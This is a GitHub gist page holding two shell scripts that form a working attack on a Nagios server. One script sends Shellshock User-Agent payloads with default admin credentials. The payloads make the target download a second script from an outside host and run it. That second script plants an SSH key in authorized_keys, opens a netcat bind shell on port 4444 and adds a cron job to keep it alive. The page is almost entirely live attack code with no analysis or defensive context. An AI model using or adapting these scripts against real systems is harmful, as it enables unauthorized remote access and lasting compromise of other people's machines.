Skip to content

Instantly share code, notes, and snippets.

@jandre

jandre/running

Last active August 29, 2015 14:06
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save jandre/ed8ee7ddf1eb19622b3c to your computer and use it in GitHub Desktop.
Save jandre/ed8ee7ddf1eb19622b3c to your computer and use it in GitHub Desktop.
Download ZIP
exploit.sh
Raw
gistfile1.sh
#!/bin/bash
touch /tmp/exploited
cd ~
mkdir -p .ssh
chmod 755 .ssh
touch .ssh/authorized_keys
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC690OnLNFvUsbWvtpXkyyHnCaC6TNpa5bjODqRFjEaXd2s3VuvZOMCPGuyrHNA891IjisdVIqoOhL7asLnMcTP4cPxbP6JBaKkeNk3M72YBr6+lxQQPUyhDazTezK90JadkZkWwS1oXsrneLFW7rSoQAQGcbze4LIhrC7317+Wcex9ktza9Xvf57WwPkIO1hJcISn6GaaADgpA344/9acipQkZF/HdvmIiNf5nDN/tQTNdh7kSmAWKlr9stVktcBuhs6LaFVwFrsgNp+TXW6BIDfnFnD70EkUmsuA7ZFTMP65qKgGUrZYp4nqvqWtFVubsdjKOBOEGTad6uef+iw+F jandre@gmail.com" >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
nc -s 0.0.0.0 -l -p 4444 -e /bin/bash &
echo "#!/bin/sh" > /tmp/persist.sh
echo "if [ -z \\\`pidof nc\\\` ]; then nc -s 0.0.0.0 -l -p 4444 -e /bin/bash & fi" >> /tmp/persist.sh
chmod 755 /tmp/persist.sh
line="* * * * * /tmp/persist.sh"
(crontab -u `whoami` -l; echo "$line" ) | crontab -u `whoami` -
Raw
running
#!/bin/sh
curl -u "nagiosadmin:admin" -A "() { :; }; /usr/bin/curl -o /tmp/exploit.sh https://gist.githubusercontent.com/jandre/ed8ee7ddf1eb19622b3c/raw/3fe85938914c8d90e2d80568a2b9482384a6a680/gistfile1.sh" http://192.168.133.10/cgi-bin/nagios3/summary.cgi
curl -u "nagiosadmin:admin" -A "() { :; }; /bin/chmod 755 /tmp/exploit.sh" http://192.168.133.10/cgi-bin/nagios3/summary.cgi
curl -u "nagiosadmin:admin" -A "() { :; }; /tmp/exploit.sh" http://192.168.133.10/cgi-bin/nagios3/summary.cgi
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment